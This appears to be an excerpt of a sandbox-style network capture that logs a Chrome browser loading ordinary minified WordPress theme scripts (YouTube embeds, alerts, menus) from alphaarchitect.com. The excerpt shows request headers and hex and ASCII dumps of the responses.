                                                                                                                                                                                                                                                                        Data Ascii: 10c2var prevCallback=window.onYouTubePlayerAPIReady,fusionTimeout=[];function registerYoutubePlayers(e){!0===window.yt_vid_exists&&(window.$youtube_players=[],jQuery(".tfs-slider").each(function(){var t=jQuery(this),a=t.find("[data-youtube-video-id]").f
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 76 65 22 29 29 26 26 28 28 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 29 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 69 66 72 61 6d 65 5f 61 70 69 22 2c 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 6e 59 6f 75 54 75 62 65 50 6c 61 79 65 72 41 50 49 52 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7b 77 69 6e 64 6f 77 2e 59 54 52 65 61 64 79 28 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 6e 50 6c 61 79 65 72 53 74 61 74 65 43 68 61 6e 67 65 28 65
                                                                                                                                                                                                                                                                        Data Ascii: ve"))&&((e=document.createElement("script")).src="https://www.youtube.com/iframe_api",(t=document.getElementsByTagName("script")[0]).parentNode.insertBefore(e,t))}function onYouTubePlayerAPIReadyCallback(){window.YTReady(!0)}function onPlayerStateChange(e
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 29 7b 76 6f 69 64 20 30 3d 3d 3d 66 75 73 69 6f 6e 54 69 6d 65 6f 75 74 5b 65 5d 26 26 28 66 75 73 69 6f 6e 54 69 6d 65 6f 75 74 5b 65 5d 3d 30 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f 69 64 20 30 21 3d 3d 77 69 6e 64 6f 77 2e 24 79 6f 75 74 75 62 65 5f 70 6c 61 79 65 72 73 26 26 76 6f 69 64 20 30 21 3d 3d 77 69 6e 64 6f 77 2e 24 79 6f 75 74 75 62 65 5f 70 6c 61 79 65 72 73 5b 65 5d 26 26 76 6f 69 64 20 30 21 3d 3d 77 69 6e 64 6f 77 2e 24 79 6f 75 74 75 62 65 5f 70 6c 61 79 65 72 73 5b 65 5d 2e 70 6c 61 79 56 69 64 65 6f 3f 77 69 6e 64 6f 77 2e 24 79 6f 75 74 75 62 65 5f 70 6c 61 79 65 72 73 5b 65 5d 2e 70 6c 61 79 56 69 64 65 6f 28 29 3a 35 3e 2b 2b 66 75 73 69 6f 6e 54 69 6d 65 6f 75 74 5b 65 5d 26 26 66 75 73 69 6f
                                                                                                                                                                                                                                                                        Data Ascii: ){void 0===fusionTimeout[e]&&(fusionTimeout[e]=0),setTimeout(function(){void 0!==window.$youtube_players&&void 0!==window.$youtube_players[e]&&void 0!==window.$youtube_players[e].playVideo?window.$youtube_players[e].playVideo():5>++fusionTimeout[e]&&fusio
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC683INData Raw: 26 6f 2e 73 65 74 50 6c 61 79 62 61 63 6b 51 75 61 6c 69 74 79 28 22 68 64 37 32 30 22 29 29 7d 7d 3b 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 66 75 6c 6c 77 69 64 74 68 2e 76 69 64 65 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 66 69 6e 64 28 22 5b 64 61 74 61 2d 79 6f 75 74 75 62 65 2d 76 69 64 65 6f 2d 69 64 5d 22 29 26 26 28 77 69 6e 64 6f 77 2e 79 74 5f 76 69 64 5f 65 78 69 73 74 73 3d 21 30 29 7d 29 2c 65 3d 6a 51 75 65 72 79 28 22 69 66 72 61 6d 65 22 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29
                                                                                                                                                                                                                                                                        Data Ascii: &o.setPlaybackQuality("hd720"))}};jQuery(document).ready(function(){var e;jQuery(".fusion-fullwidth.video-background").each(function(){jQuery(this).find("[data-youtube-video-id]")&&(window.yt_vid_exists=!0)}),e=jQuery("iframe"),jQuery.each(e,function(e,t)
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        126192.168.2.449884141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC835OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-alert.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-103"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147819
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba2979e34339-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC266INData Raw: 31 30 33 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 72 65 61 64 79 20 66 75 73 69 6f 6e 2d 65 6c 65 6d 65 6e 74 2d 72 65 6e 64 65 72 2d 66 75 73 69 6f 6e 5f 61 6c 65 72 74 22 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 28 76 6f 69 64 20 30 21 3d 3d 6e 3f 6a 51 75 65 72 79 28 27 64 69 76 5b 64 61 74 61 2d 63 69 64 3d 22 27 2b 6e 2b 27 22 5d 27 29 2e 66 69 6e 64 28 22 2e 66 75 73 69 6f 6e 2d 61 6c 65 72 74 20 2e 63 6c 6f 73 65 22 29 3a 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 61 6c 65 72 74 20 2e 63 6c 6f 73 65 22 29 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 28 29 2e 73 6c 69 64
                                                                                                                                                                                                                                                                        Data Ascii: 103jQuery(document).on("ready fusion-element-render-fusion_alert",function(e,n){(void 0!==n?jQuery('div[data-cid="'+n+'"]').find(".fusion-alert .close"):jQuery(".fusion-alert .close")).on("click",function(e){e.preventDefault(),jQuery(this).parent().slid
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        127192.168.2.449885141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC831OUTGET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-menu.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-38c7"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147819
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba297dd342d7-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC877INData Raw: 33 38 63 37 0d 0a 76 61 72 20 66 75 73 69 6f 6e 4e 61 76 43 6c 69 63 6b 45 78 70 61 6e 64 42 74 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 3f 6a 51 75 65 72 79 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 3a 6a 51 75 65 72 79 28 65 29 2c 61 3d 6e 2e 70 61 72 65 6e 74 28 29 3b 61 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 22 65 78 70 61 6e 64 65 64 22 29 2c 61 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 66 61 6c 73 65 22 3d 3d 3d 61 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 29 3f 22 74 72 75 65 22 3a 22 66 61 6c 73 65 22 29 2c 6e 2e 61 74
                                                                                                                                                                                                                                                                        Data Ascii: 38c7var fusionNavClickExpandBtn=function(e){var n="object"==typeof e&&"object"==typeof e.currentTarget?jQuery(e.currentTarget):jQuery(e),a=n.parent();a.toggleClass("expanded"),a.attr("aria-expanded","false"===a.attr("aria-expanded")?"true":"false"),n.at
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 61 72 67 65 74 26 26 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 61 2e 68 61 73 43 6c 61 73 73 28 22 63 6f 6c 6c 61 70 73 65 2d 65 6e 61 62 6c 65 64 22 29 3f 28 61 2e 68 61 73 43 6c 61 73 73 28 22 61 77 62 2d 6d 65 6e 75 5f 6d 6f 62 69 6c 65 2d 61 63 63 6f 72 64 69 6f 6e 22 29 26 26 75 2e 73 69 62 6c 69 6e 67 73 28 22 2e 65 78 70 61 6e 64 65 64 22 29 2e 66 69 6e 64 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 5f 6f 70 65 6e 2d 6e 61 76 2d 73 75 62 6d 65 6e 75 5f 6d 6f 62 69 6c 65 22 29 2e 74 72 69 67 67 65 72 28 22 63 6c 69 63 6b 22 29 2c 75 2e 63 68 69 6c 64 72 65 6e 28 22 2e 66 75 73 69 6f 6e 2d 6d 65 67 61 6d 65 6e 75 2d 77 72 61 70 70 65 72 2c 20 2e 61 77 62 2d 6d 65 6e 75 5f 5f 73 75 62 2d 75 6c 2c 20 2e
                                                                                                                                                                                                                                                                        Data Ascii: t"==typeof e.target&&e.preventDefault(),a.hasClass("collapse-enabled")?(a.hasClass("awb-menu_mobile-accordion")&&u.siblings(".expanded").find(".awb-menu__open-nav-submenu_mobile").trigger("click"),u.children(".fusion-megamenu-wrapper, .awb-menu__sub-ul, .
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 2e 64 61 74 61 28 22 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 65 22 29 29 2c 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 68 61 73 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 62 75 69 6c 64 65 72 2d 6c 69 76 65 22 29 26 26 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 68 61 73 43 6c 61 73 73 28 22 61 76 61 64 61 2d 66 6f 6f 74 65 72 2d 66 78 2d 70 61 72 61 6c 6c 61 78 2d 65 66 66 65 63 74 22 29 26 26 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 61 64 64 43 6c 61 73 73 28 22 61 76 61 64 61 2d 66 6c 79 6f 75 74 2d 73 75 62 6d 65 6e 75 2d 61 63 74 69 76 65 22 29 29 2c 75 2e 68 61 73 43 6c 61 73 73 28 22 61 77 62 2d 6d 65 6e 75 5f 5f 6c 69 5f 73 65 61 72 63 68 2d 64 72 6f 70 64 6f 77 6e 22 29 26 26 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                                        Data Ascii: .data("transition-time")),jQuery("body").hasClass("fusion-builder-live")&&jQuery("body").hasClass("avada-footer-fx-parallax-effect")&&jQuery("body").addClass("avada-flyout-submenu-active")),u.hasClass("awb-menu__li_search-dropdown")&&setTimeout(function()
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 67 74 68 3f 69 2e 66 69 6e 64 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 5f 73 75 62 2d 61 72 72 6f 77 22 29 2e 6f 75 74 65 72 57 69 64 74 68 28 29 3a 30 3b 21 63 7c 7c 66 7c 7c 6d 2e 68 61 73 43 6c 61 73 73 28 22 61 77 62 2d 6d 65 6e 75 5f 66 6c 79 6f 75 74 22 29 7c 7c 6d 2e 68 61 73 43 6c 61 73 73 28 22 61 77 62 2d 6d 65 6e 75 5f 76 2d 73 74 61 63 6b 65 64 22 29 7c 7c 21 63 2e 6c 65 6e 67 74 68 7c 7c 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 68 61 73 43 6c 61 73 73 28 22 73 69 64 65 2d 68 65 61 64 65 72 22 29 26 26 30 3c 6d 2e 63 6c 6f 73 65 73 74 28 22 23 73 69 64 65 2d 68 65 61 64 65 72 2e 66 75 73 69 6f 6e 2d 74 62 2d 68 65 61 64 65 72 22 29 2e 6c 65 6e 67 74 68 7c 7c 28 73 3d 63 2e 63 73 73 28 22 6c 65 66 74 22 29 2c 74 3d 63 2e 63 73 73 28 22 72 69 67
                                                                                                                                                                                                                                                                        Data Ascii: gth?i.find(".awb-menu__sub-arrow").outerWidth():0;!c||f||m.hasClass("awb-menu_flyout")||m.hasClass("awb-menu_v-stacked")||!c.length||jQuery("body").hasClass("side-header")&&0<m.closest("#side-header.fusion-tb-header").length||(s=c.css("left"),t=c.css("rig
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 73 75 62 6d 65 6e 75 5f 6d 61 69 6e 22 29 29 7d 2c 66 75 73 69 6f 6e 4e 61 76 41 6c 74 41 72 72 6f 77 73 43 6c 61 73 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 6a 51 75 65 72 79 28 65 29 2e 66 69 6e 64 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 5f 73 75 62 2d 61 72 72 6f 77 22 29 2e 6c 65 6e 67 74 68 29 7b 6a 51 75 65 72 79 28 65 29 2e 66 69 6e 64 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 5f 73 75 62 2d 61 72 72 6f 77 20 2b 20 75 6c 20 3e 20 2e 61 77 62 2d 6d 65 6e 75 5f 5f 73 75 62 2d 6c 69 3a 6e 6f 74 28 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 29 3a 66 69 72 73 74 2d 63 68 69 6c 64 22 29 2e 6f 6e 28 22 6d 6f 75 73 65 65 6e 74 65 72 20 6d 6f 75 73 65 6c 65 61 76 65 20 66 6f 63 75 73 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 6a
                                                                                                                                                                                                                                                                        Data Ascii: submenu_main"))},fusionNavAltArrowsClass=function(e){if(jQuery(e).find(".awb-menu__sub-arrow").length){jQuery(e).find(".awb-menu__sub-arrow + ul > .awb-menu__sub-li:not(.current-menu-item):first-child").on("mouseenter mouseleave focus",function(e){var n=j
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 5f 6f 70 65 6e 2d 6e 61 76 2d 73 75 62 6d 65 6e 75 5f 6d 6f 62 69 6c 65 2c 20 2e 61 77 62 2d 6d 65 6e 75 5f 5f 6f 70 65 6e 2d 6e 61 76 2d 73 75 62 6d 65 6e 75 5f 63 6c 69 63 6b 2c 20 2e 61 77 62 2d 73 75 62 6d 65 6e 75 5f 5f 6f 70 65 6e 2d 6e 61 76 2d 73 75 62 6d 65 6e 75 5f 63 6c 69 63 6b 22 29 2e 6f 66 66 28 22 63 6c 69 63 6b 2e 65 78 70 61 6e 64 53 75 62 6d 65 6e 75 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 65 78 70 61 6e 64 53 75 62 6d 65 6e 75 22 2c 66 75 73 69 6f 6e 4e 61 76 43 6c 69 63 6b 45 78 70 61 6e 64 53 75 62 6d 65 6e 75 42 74 6e 29 2c 6a 51 75 65 72 79 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 5f 6c 69 5f 73 65 61 72 63 68 2d 64 72 6f 70 64 6f 77 6e 20 2e 61 77 62 2d 6d 65 6e 75 5f 5f 6d 61 69 6e 2d 61 22 29 2e 6f
                                                                                                                                                                                                                                                                        Data Ascii: (".awb-menu__open-nav-submenu_mobile, .awb-menu__open-nav-submenu_click, .awb-submenu__open-nav-submenu_click").off("click.expandSubmenu").on("click.expandSubmenu",fusionNavClickExpandSubmenuBtn),jQuery(".awb-menu__li_search-dropdown .awb-menu__main-a").o
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 68 74 6d 6c 22 29 2e 6f 6e 28 22 6d 6f 75 73 65 6c 65 61 76 65 22 2c 22 2e 66 75 73 69 6f 6e 2d 6e 6f 2d 74 6f 75 63 68 20 2e 61 77 62 2d 6d 65 6e 75 5f 66 6c 79 6f 75 74 2e 61 77 62 2d 6d 65 6e 75 5f 64 65 73 6b 74 6f 70 20 2e 61 77 62 2d 6d 65 6e 75 5f 5f 73 75 62 2d 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2c 6e 3d 65 2e 70 61 72 65 6e 74 28 29 3b 76 6f 69 64 20 30 21 3d 3d 6e 2e 64 61 74 61 28 22 69 74 65 6d 2d 69 64 22 29 26 26 28 65 2e 63 6c 6f 73 65 73 74 28 22 2e 61 77 62 2d 6d 65 6e 75 22 29 2e 66 69 6e 64 28 22 2e 66 75 73 69 6f 6e 2d 66 6c 79 6f 75 74 2d 6d 65 6e 75 2d 62 61 63 6b 67 72 6f 75 6e 64 73 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 66 6c 79 6f 75 74 2d
                                                                                                                                                                                                                                                                        Data Ascii: html").on("mouseleave",".fusion-no-touch .awb-menu_flyout.awb-menu_desktop .awb-menu__sub-a",function(){var e=jQuery(this),n=e.parent();void 0!==n.data("item-id")&&(e.closest(".awb-menu").find(".fusion-flyout-menu-backgrounds").removeClass("fusion-flyout-
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 2d 66 75 6c 6c 2d 61 62 73 6f 6c 75 74 65 22 29 7c 7c 6e 2e 68 61 73 43 6c 61 73 73 28 22 6d 6f 62 69 6c 65 2d 73 69 7a 65 2d 63 6f 6c 75 6d 6e 2d 61 62 73 6f 6c 75 74 65 22 29 29 26 26 65 2e 6c 65 6e 67 74 68 26 26 22 22 21 3d 3d 74 68 69 73 2e 68 61 73 68 2e 73 6c 69 63 65 28 31 29 26 26 6e 2e 66 69 6e 64 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 5f 6d 2d 74 6f 67 67 6c 65 22 29 2e 74 72 69 67 67 65 72 28 22 63 6c 69 63 6b 22 29 7d 29 2c 6a 51 75 65 72 79 28 22 2e 61 77 62 2d 6d 65 6e 75 5f 76 2d 73 74 61 63 6b 65 64 2e 61 77 62 2d 6d 65 6e 75 5f 65 6d 2d 68 6f 76 65 72 20 2e 61 77 62 2d 6d 65 6e 75 5f 5f 6c 69 22 29 2e 6f 66 66 28 22 6d 6f 75 73 65 65 6e 74 65 72 2e 76 65 72 74 69 63 61 6c 4d 65 6e 75 22 29 2e 6f 6e 28 22 6d 6f 75 73 65 65 6e 74 65 72 2e 76
                                                                                                                                                                                                                                                                        Data Ascii: -full-absolute")||n.hasClass("mobile-size-column-absolute"))&&e.length&&""!==this.hash.slice(1)&&n.find(".awb-menu__m-toggle").trigger("click")}),jQuery(".awb-menu_v-stacked.awb-menu_em-hover .awb-menu__li").off("mouseenter.verticalMenu").on("mouseenter.v
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 75 62 6d 65 6e 75 5f 5f 6c 69 22 29 2e 6f 66 66 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 76 65 72 74 69 63 61 6c 4d 65 6e 75 22 29 2e 6f 6e 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 76 65 72 74 69 63 61 6c 4d 65 6e 75 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 66 69 6e 64 28 22 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 6c 65 6e 67 74 68 7c 7c 28 6a 51 75 65 72 79 28 74 68 69 73 29 2e 73 74 6f 70 28 29 2c 66 75 73 69 6f 6e 56 65 72 74 69 63 61 6c 53 75 62 6d 65 6e 75 44 69 72 65 63 74 69 6f 6e 28 6a 51 75 65 72 79 28 74 68 69 73 29 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 68 69 6c 64 72 65 6e 28 22 2e 61 77 62 2d 73 75 62 6d 65 6e 75 5f 5f 73 75 62 2d 61 2c 20 2e 61 77 62 2d 73 75 62 6d 65 6e 75 5f
                                                                                                                                                                                                                                                                        Data Ascii: ubmenu__li").off("mouseleave.verticalMenu").on("mouseleave.verticalMenu",function(){jQuery(this).find(".current-menu-item").length||(jQuery(this).stop(),fusionVerticalSubmenuDirection(jQuery(this)),jQuery(this).children(".awb-submenu__sub-a, .awb-submenu_
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1369INData Raw: 75 5f 5f 6f 70 65 6e 2d 6e 61 76 2d 73 75 62 6d 65 6e 75 2d 68 6f 76 65 72 22 29 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 74 72 75 65 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 68 69 6c 64 72 65 6e 28 22 2e 61 77 62 2d 73 75 62 6d 65 6e 75 5f 5f 73 75 62 2d 61 22 29 2e 66 69 6e 64 28 22 2e 61 77 62 2d 73 75 62 6d 65 6e 75 5f 5f 6f 70 65 6e 2d 6e 61 76 2d 73 75 62 6d 65 6e 75 2d 68 6f 76 65 72 22 29 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 74 72 75 65 22 29 7d 29 7d 29 7d 2c 66 75 73 69 6f 6e 41 64 6a 75 73 74 4e 61 76 4d 6f 62 69 6c 65 50 6f 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 73 69 6f 6e 4e 61 76 4d 6f
                                                                                                                                                                                                                                                                        Data Ascii: u__open-nav-submenu-hover").attr("aria-expanded","true"),jQuery(this).children(".awb-submenu__sub-a").find(".awb-submenu__open-nav-submenu-hover").attr("aria-expanded","true")})})},fusionAdjustNavMobilePosition=function(){setTimeout(function(){fusionNavMo


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        128192.168.2.449886141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC833OUTGET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/awb-mega-menu.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
